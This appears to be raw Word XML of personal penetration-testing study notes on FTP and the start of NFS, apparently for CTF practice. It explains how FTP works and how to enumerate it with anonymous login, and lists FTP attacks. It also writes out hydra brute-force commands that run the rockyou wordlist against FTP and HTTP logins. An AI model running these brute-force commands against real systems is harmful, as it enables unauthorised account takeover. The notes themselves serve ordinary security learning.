    <w:p w14:paraId="69582D3E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Understanding FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CC88C0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>File Transfer Protocol – port 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA72244" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Client-server model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DA4F8F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Client initiates connection, server validates login credentials, enabling execution of FTP commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772B1E60" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>How does FTP work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C394BA0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Uses two channels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D17119D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Command/control channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090BA1BC" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Data channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4859C7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Active versus Passive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A8EEC6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Active allows client to open a port and listen. Server is required to actively connect to it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DD06B5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Passive allows server to open a port and listen and the client connects to it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3157335C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumerating FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795A0F95" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Nmap to assist in the exploitation of an anonymous FTP login to search for files that can assist in insertion of reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F14CC0E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Common for CTF challenges as it mimics realistic faulty implementation of FTP servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE4F18E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Need ftp client on attacking machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09139E78" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Alternative Enumeration Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B318D1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Some vulnerable versions of in.ftpd and other FTP server variants, each of which return different responses to “cwd” command for home directories which do and don’t exist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CBDEC0" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“cwd” can be issued before authentication, assisting in recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052D108B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>More common in legacy FTP versions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE05F18" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Access syntax: ftp &lt;ip&gt;, then enter user anonymouse and no password when prompted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ACE7D6" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Access directory and use get command to retrieve files and save info on attacking computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2246DC51" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Exploiting FTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137EC9DF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Types of FTP Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02133D91" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Command and data channels are unencrypted, as with Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372D9714" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>MiTM attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B09A4F8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ARP-poisoning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0AB29B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Weak or default password configurations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7172CF87" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Method Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C906B8C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Enumeration reveals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7ABD4A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>FTP server running on machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBC9B26" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Possible username</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4498BD6C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Bruteforce via hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A7B00D" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Hydra</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6619B810" w14:textId="153EB95E" w:rsidR="00DC7D6C" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Ex. Syntax: hydra -t 4 -l &lt;username&gt; -P /usr/share/wordlists/rockyou.txt -vV &lt;ip&gt; ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225A025F" w14:textId="52CBFB0C" w:rsidR="00AC5C36" w:rsidRPr="00F512ED" w:rsidRDefault="00AC5C36" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidR="00A04CD7">
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r>
        <w:t>hydra -l &lt;username&gt; -P /usr/share/wordlists/rockyou.txt -f &lt;ip&gt; http-get /&lt;directory&gt;/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B739BF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Hydra – runs tool</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272F1880" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-t 4 – number of parallel connections per target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CB9E3F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-l [user] – points to user account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2282B61F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-P – path to wordlist dictionary for bruteforce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9197EF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>-vV – verbose set to very verbose</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7E690A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>&lt;ip&gt; - ip addr of target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B908DD4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>ftp/protocol – sets protocol hydra is to use (can be one of 50 protocols)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239DFF1E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>will reveal password if found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F50FA89" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>use ftp&lt;ip&gt; and login info to access compromised user, navigate as usual, use get command to retrieve info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A85566" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E11F2B" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Network Services Part 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B758ACA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Understanding NFS – ports 2049 (NSFV4/V3), 111 (RPC via NSFV3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275A3CE1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Network File System – allows system to share directories and files with others over a network – files mounted on a server for local-like access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDE40E1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>NFS Workings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286BD9F9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Client requests to mount a directory from a remote host on a local directory – mount service then acts to connect to the relevant mount daemon using RPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C95DDF4" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Server checks if user has permission to mount whatever directory has been requested </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> then return a file handle to unique ID each file and directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C70B1D5" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">To access using NFS </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> RPC call is placed to NFSD (NFS daemon)</w:t>
      </w:r>
    </w:p>
